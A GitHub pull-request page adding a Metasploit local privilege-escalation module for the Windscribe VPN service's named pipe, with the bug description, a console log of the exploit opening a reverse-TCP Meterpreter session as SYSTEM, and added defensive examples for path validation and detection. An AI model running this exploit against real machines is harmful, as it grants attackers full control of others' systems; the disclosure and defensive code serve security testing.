
Add Windscribe WindscribeService Named Pipe Privilege Escalation #12894

Merged


bcoles commented Feb 1, 2020

Add Windscribe WindscribeService Named Pipe Privilege Escalation

The Windscribe VPN client application for Windows makes use of a
Windows service WindscribeService.exe which exposes a named pipe
\\.\pipe\WindscribeService allowing execution of programs with
elevated privileges.

Windscribe versions prior to 1.82 do not validate user-supplied
program names, allowing execution of arbitrary commands as SYSTEM.
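The defect described above is a missing input check: a privileged service accepts a program name from an unprivileged pipe client and runs it as-is. The following is an added example (not code from this pull request, the Metasploit module, or Windscribe) of the kind of validation a privileged named-pipe server should apply before launching anything on a client's behalf. The install directory `C:\Program Files\Windscribe` and the binary name `WindscribeEngine.exe` are assumptions used only to build an allowlist; the rejected temp-directory path is the one from the test session in this PR. It uses `ntpath` so it runs on any platform.

```python
import ntpath

# Assumed install directory and allowed binary; these names are hypothetical
# and not taken from the page. A real policy would hold the exact binaries
# the service legitimately needs to launch, nothing broader.
TRUSTED_ROOT = r"C:\Program Files\Windscribe"
ALLOWED_PROGRAMS = {
    ntpath.normcase(ntpath.join(TRUSTED_ROOT, "WindscribeEngine.exe")),
}
MAX_PATH = 260


def validate_program(requested: str):
    """Decide whether a client-supplied program path may be executed.

    Returns (ok, reason). The policy is deny-by-default: the path must be an
    absolute, drive-letter path that normalizes to an allowlisted binary.
    Relative names, UNC paths, traversal, alternate data streams and
    control characters are all rejected before the allowlist lookup.
    """
    if not requested or len(requested) > MAX_PATH:
        return False, "empty or over MAX_PATH"
    if any(ord(c) < 32 for c in requested):
        return False, "control character in path"

    # Require "X:\..." form; this also rejects "\\server\share\..." (UNC) and
    # drive-relative "C:foo" forms, which resolve against service state.
    drive, _ = ntpath.splitdrive(requested)
    if len(drive) != 2 or drive[1] != ":" or not ntpath.isabs(requested):
        return False, "not an absolute drive-letter path"

    # Collapse ".." and "." and unify separators before comparing, so that
    # "C:\Program Files\Windscribe\..\..\Users\x\evil.exe" is judged by
    # where it actually points.
    normalized = ntpath.normpath(requested)
    _, tail = ntpath.splitdrive(normalized)
    if ":" in tail:
        return False, "alternate data stream syntax rejected"

    # Case-insensitive exact match against the allowlist; anything else,
    # including files under user-writable locations such as %TEMP%, is denied.
    if ntpath.normcase(normalized) not in ALLOWED_PROGRAMS:
        return False, "program not on allowlist"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample requests: one legitimate, the rest are the shapes an
    # untrusted pipe client could send.
    for candidate in (
        r"C:\Program Files\Windscribe\WindscribeEngine.exe",
        r"C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe",
        r"C:\Program Files\Windscribe\..\..\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe",
        r"WindscribeEngine.exe",
        r"\\attacker\share\x.exe",
    ):
        print(candidate, "->", validate_program(candidate))
```

Path validation is only half of the fix: the service should also check the calling process's identity (on Windows, via named-pipe client impersonation) and set a restrictive pipe security descriptor, so that the launch decision does not rest on string matching alone.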

@bcoles bcoles added module docs labels Feb 1, 2020
@bwatters-r7 bwatters-r7 self-assigned this Feb 5, 2020

bwatters-r7 commented Feb 5, 2020

msf5 exploit(multi/handler) > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > show options

Module options (exploit/windows/local/windscribe_windscribeservice_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
session => 1
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
verbose => true
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Writing payload (283 bytes) to C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe ...
[*] Sending C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe to \\.\pipe\WindscribeService ...
[+] Opended \\.\pipe\WindscribeService! Proceeding ...
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49682) at 2020-02-05 12:30:36 -0600
[-] Failed to delete C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe: stdapi_fs_delete_file: Operation failed: Access is denied.

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
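The session above shows the observable side of this bug: a payload dropped in the user's `%LOCALAPPDATA%\Temp` is handed to `\\.\pipe\WindscribeService` and comes back as a process running as `NT AUTHORITY\SYSTEM`. The following is an added example (not part of this PR or the Metasploit module) of a detection over process-creation events that flags children of `WindscribeService.exe` launched as SYSTEM from outside the product's install directory. The event field names (`Image`, `ParentImage`, `User`), the sample events and the install directory `C:\Program Files\Windscribe` are constructed assumptions; the temp path and hostname are the ones visible in the test session.

```python
import ntpath

# Assumed install directory of the service (hypothetical, not from the page).
TRUSTED_ROOT = ntpath.normcase(r"C:\Program Files\Windscribe")
# Service binary named in the PR description.
SERVICE_IMAGE = "windscribeservice.exe"
SYSTEM_USER = ntpath.normcase(r"NT AUTHORITY\SYSTEM")


def is_under(path: str, root: str) -> bool:
    """Case-insensitive containment test after normalizing '..' and '/'."""
    p = ntpath.normcase(ntpath.normpath(path))
    return p == root or p.startswith(root + "\\")


def is_suspicious_launch(event: dict) -> bool:
    """True when the VPN service spawned a SYSTEM child from outside its own
    install directory, which is how the privilege escalation manifests."""
    parent = ntpath.normcase(event.get("ParentImage", ""))
    if ntpath.basename(parent) != SERVICE_IMAGE:
        return False
    if ntpath.normcase(event.get("User", "")) != SYSTEM_USER:
        return False
    return not is_under(event.get("Image", ""), TRUSTED_ROOT)


def suspicious_launches(events):
    """Return the child image paths of every flagged event, in input order."""
    return [e["Image"] for e in events if is_suspicious_launch(e)]


# Constructed process-creation events modelled on Sysmon-style fields.
SAMPLE_EVENTS = [
    {   # the launch seen in the test session: temp-dir payload run as SYSTEM
        "Computer": "DESKTOP-D1E425Q",
        "ParentImage": r"C:\Program Files\Windscribe\WindscribeService.exe",
        "Image": r"C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # legitimate helper launched from the install directory (assumed name)
        "Computer": "DESKTOP-D1E425Q",
        "ParentImage": r"C:\Program Files\Windscribe\WindscribeService.exe",
        "Image": r"C:\Program Files\Windscribe\WindscribeEngine.exe",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # same temp binary started by the user's own shell: not an escalation
        "Computer": "DESKTOP-D1E425Q",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe",
        "User": r"DESKTOP-D1E425Q\msfuser",
    },
    {   # traversal that nominally starts inside the install directory
        "Computer": "DESKTOP-D1E425Q",
        "ParentImage": r"C:\Program Files\Windscribe\WindscribeService.exe",
        "Image": r"C:\Program Files\Windscribe\..\..\Users\msfuser\AppData\Local\Temp\x.exe",
        "User": r"NT AUTHORITY\SYSTEM",
    },
]

if __name__ == "__main__":
    for image in suspicious_launches(SAMPLE_EVENTS):
        print("ALERT: WindscribeService.exe spawned SYSTEM child outside install dir:", image)
```

The rule keys on parent image and integrity context rather than on the payload's file name, so it is not tied to the random names the module generates; tune `TRUSTED_ROOT` to the actual install path observed on the fleet before deploying it.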

bwatters-r7 added a commit that referenced this pull request Feb 5, 2020
…calation

Merge branch 'land-12894' into upstream-master
@bwatters-r7 bwatters-r7 merged commit 34621c0 into rapid7:master Feb 5, 2020
3 checks passed
Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
@bcoles bcoles deleted the bcoles:windscribe_windscribeservice_priv_esc branch Feb 5, 2020

bwatters-r7 commented Feb 5, 2020

Release Notes

This PR adds a local privilege escalation module for exploiting a vulnerability in the Windscribe service installed by Windscribe VPN versions < 1.82 that allows a user to run an arbitrary executable as SYSTEM.
